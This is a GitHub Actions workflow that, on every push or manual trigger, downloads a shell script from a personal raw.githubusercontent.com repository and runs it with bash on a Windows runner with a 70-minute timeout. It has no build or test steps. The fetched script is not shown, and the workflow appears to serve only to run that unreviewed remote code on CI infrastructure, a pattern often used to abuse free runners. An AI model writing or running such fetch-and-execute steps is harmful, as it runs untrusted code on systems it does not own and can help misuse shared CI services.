name: my personal

on: [push, workflow_dispatch]

jobs:
  build:
    timeout-minutes: 70
    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/sdtuif/Sa/main/ss.sh -OutFile ss.sh
    - run: bash ss.sh
